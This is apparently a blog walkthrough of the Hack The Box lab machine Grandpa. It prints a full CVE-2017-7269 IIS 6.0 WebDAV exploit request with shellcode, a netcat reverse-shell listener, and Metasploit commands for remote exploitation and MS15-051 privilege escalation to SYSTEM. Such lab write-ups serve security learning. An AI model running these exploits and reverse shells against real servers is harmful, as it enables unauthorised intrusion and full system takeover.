HTB: Grandpa

Details

This machine is Grandpa from Hack The Box

Recon Phase

Start with a service discovery

root@kali:~# nmap -sV -p- -T4 10.10.10.14
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 07:29 EDT
Nmap scan report for 10.10.10.14
Host is up (0.033s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Ser vice Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

User Hunting

So off to the web server

Screenshot 1

I looked around for a bit and found CVE-2017-7269 which was a vulnerability in the web server itself, so I tested it using an exploit from https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell

root@kali:~# nc -nlvp 4444
root@kali:~# python exploit.py 10.10.10.14 80 10.10.14.35 4444
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa₩ᄑᄄ￧ᄀᆪ￧ンᄀ￧トᄈ₩ᄂᄊ¦ンᄇ￧ᄄᄍ¦ᆳᄋ¦ᄑᄚ￧ユモ￧ᄅマ¦ᄀᄄ¥ルᆪ₩ᄉヤ₩ᄀナ ̄ᆬモ¥チᆲ¥ユᄃ₩ンᆪ ̄ヘᄂ¦リᄚ￧ᄀナ₩ᆬメ¥ミᄆ¦ᄆリ₩ᄅム￧ノチ¦ネᄆ￧タᄉ¥ᄀミ ̄ルᄂ₩ᄆヌ ̄ヤᄍ¥ムᆰ¥タᄡ¥ムテ￧ンメ¥チᄀ ̄ネᄇ₩ᄉヒ₩ᄚᄡ ̄ノヌ₩ノチ ̄ンヘ¥ナᄀ¥ᄀᄁ¦ンᄈ¥ノミ ̄ルᄚ￧ユト₩ᄀᆰ ̄ヘᄡ¦ᄍハ￧ᄀᆱ¦ᆬᄊ¦ᄍᄈ¦ᄆᆰ¥ンᄎ₩ᄑᄆ¥ᄀハ ̄ネᄚ ̄ンᆴ¦ᆳノ¥ノヘ¦ᄀᆪ₩ᄑフ￧ユヨ￧ユᄉ₩ルᆵ￧ルᄄ¦ムヘ¥チᄚ￧ᄄᄊ₩ノヒ₩ユラ￧ユミ₩ᄅᄇ￧ᄅᆱ￧ンᄁ￧ルリ₩ノネ₩ヤᄆ ̄チヤ₩ᄆᄍ¥チハ¥ムᄁ¥タᄈ ̄ユᄋ₩ᄅᄋ¦ナト ̄フᄡ₩ムᄊ¦ᄉニ¥ルヤ¦ンᆲ₩ユテ￧リᄇ￧ノᄌ¥ンᄅ¦フᄌ₩ノᄇ¥ᄄᄚ¥ᄂᄌ¥ムネ￈ツ￈ツ£ヒタ₩ᅠテ₩ᄆト¥ノヨ¦ᆲᄋ₩ᄆᆳ¦ᄑリ¥ᄀレ￧ᆬミ¦ᆬᆰ¥ᄀマ¦ᄅメ¦ナミ₩ルヘ£マタ₩ᅠテ¦ᅠᄡ₩ヤᄆ₩ᄑテ₩ᄍᆭ￧ムチ¦ヘᆲ£マタ₩ᅠテ¥ヘテ₩ᄅチ￧チメ ̄フᄚ¥ᄀᆭ¦ノフ￧チヒ₩ヘニ¥ナᄈ￧ᆬチ￧ᄅミ¦ᄅᆲ> (Not <locktoken:write1>) <http://localhost/bbbbbbb￧ᆬネ₩ナᄉ¦ᄑテ₩ᄑᄃ₩ᆳᆵ¦ᄀナ ̄ルニ₩ンᄉ¦ミᄈ ̄ᄀᄆ¥ンᆬ¥ᄅᄁ¥ミᄉ¥ルᄀ₩ᆬメ₩ᄅモ¥ナラ ̄ᄀホ¥ᆬネ₩ヘユ¦ᆬᄆ¦ヘᄂ₩ムᄇ ̄ムᄄ¦ンリ￧ナᄍ ̄ヘᆱ₩ᆳユ₩ᄉネ¥チマ￧ᄅニ ̄ムᄆ₩ᄑヤ￧ムテ¥ᆬヨ₩ᄑᆵ￧ヘチ ̄ムラ₩ナᄄ￧ᄅᄇ ̄ンナ¦ᄉノ¥ンホ¥ムネ¦ᄚᄌ ̄ルᄎ ̄ユᄇ₩ノᆭ₩ᄍテ¦ᄀᆳ ̄ユネ₩ナᄋ¦ᄉレ₩ナᄡ¦トᄈ¦ヘᆬ¥ノᄇ₩ᄉᄅ ̄ルᄆ¦ᄍᄂ₩ᄌᄍ₩ヘモ₩ᆳᄂ¥ナニ¦ᄐᄚ￧ᄀᆵ￧ノモ₩ンミ¦ユモ￧ᄅᆪ￧トᄍ¦ᄑモ¦ムヨ₩ᄐᄊ￧ヘᄍ₩ᄀᄋ￧ᄅヨ₩ナハ ̄ᆬナ ̄リᄍ₩ᄚᄍ¦ヤᄆ ̄ムᄇ¥ヘᆬ¥ᄀハ¦ムホ￧ᄅト₩ᄚᄉ¥ᄅヨ₩ノチ₩ᄍᄇ₩リᄆ¥ᆬル¥ミᄈ ̄ナツ¥ᄀᆬ¥ᆬチ￧ナミ ̄タᄊ¥ンᄋ¦ムラ¥ヘᄀ£マタ₩ᅠテ₩ᄍマ₩ᅠタ₩ᄍマ₩ᅠタ¦ノヌ￧ルᆰ£マタ₩ᅠテ¦ノラ¦ᄑᄡ¥ᆬヌ¥ネᄡ¦ᆳᆭ¦ᆳツ￧ムᄂ￧ᄀᆵ₩ツツ₩ᅠチ¥トᄉ￧ノᄎ￧ムᄎ¦ᄉヌ¦ムル¥ンラ→トモ₩ᅠタ ̄ナᄊ₩ᄍᆵ¬モᆪ₩ᅠチ£ムᅠ₩ᅠテᅩタ￧﾿ᄒ￯﾿﾿￯﾿﾿£マタ₩ᅠテ￑ᆴ₩ᅠテ￧ナᆴ￧ムᄚ£ミᄡ₩ᅠテ¬ᄃᄃ₩ᅠチ←ホム₩ᅠタ ̄ᄂᄆ₩ルᆴ¦ᆬユ ̄チメ¥ムᆱ￧ルᆱ￧ノハ￧ᆬᄀ£ミワ₩ᅠテ₩ᄌナ₩ᅠタ￧ワᄇ￧ᆬᄄ¦ᄉᄅ ̄ルᆲ¦ムᄄ¦ᄉᄚ│ノニ₩ᅠタ¦ᄀᄋ ̄ノモ£ᄊᆰ₩ᅠツ₩ᄑᆰ¦フᄉ£マᄌ₩ᅠテ¬ᄃᄃ₩ᅠチVVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJINDKSKPKPTKKQTKT0D8TKQ8RTJKKX1OTKIGJSW4R0KOIBJHKCKOKOKOF0V04PF0M0A>

and in the listener

connect to [10.10.14.35] from (UNKNOWN) [10.10.10.14] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>

I had a shell

c:\windows\system32\inetsrv>whoami
nt authority\network service
c:\windows\system32\inetsrv>cd ../../..

I then setup for windows exploit suggester

C:\>systeminfo
Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 0 Hours, 25 Minutes, 56 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 789 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,322 MB
Page File: In Use:         148 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
root@kali:~# python windows-exploit-suggester.py --database 2019-07-07-mssb.xls --systeminfo sysinfo.txt

This gave me MS15-051, but I tried various ways of getting a payload onto the system and none worked, so I ended up just switching to metasploit, first getting back to the user shell

msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.14
RHOSTS => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (179779 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.35:4444 -> 10.10.10.14:1030) at 2019-07-07 08:43:52 -0400
meterpreter >

Now setup the exploit

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.14.35
LHOST => 10.10.14.35
msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

This process didn't work, so I tried migrating to a new one

meterpreter > ps
Process List
============
 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 [SNIP]
 1836  592   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 [SNIP]
meterpreter > migrate 1836
[*] Migrating from 2452 to 1836...
[*] Migration completed successfully.

Try again

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/ms15_051_client_copy_image) > exploit
[*] Started reverse TCP handler on 10.10.14.35:4444
[*] Launching notepad to host the exploit...
[+] Process 2156 launched.
[*] Reflectively injecting the exploit DLL into 2156...
[*] Injecting exploit into 2156...
[*] Exploit injected. Injecting payload into 2156...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Command shell session 2 opened (10.10.14.35:4444 -> 10.10.10.14:1032) at 2019-07-07 08:53:14 -0400
C:\WINDOWS\system32>

A new shell

C:\WINDOWS\system32>whoami
nt authority\system

There we go

C:\WINDOWS\system32>cd ../..
C:\>cd "Documents and Settings"
C:\Documents and Settings>dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE
 Directory of C:\Documents and Settings
04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:12 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  05:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,093,408,256 bytes free
C:\Documents and Settings>cd Harry/Desktop
C:\Documents and Settings\Harry\Desktop>type user.txt
[REDACTED]
C:\Documents and Settings\Harry\Desktop>cd ../../Administrator/Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.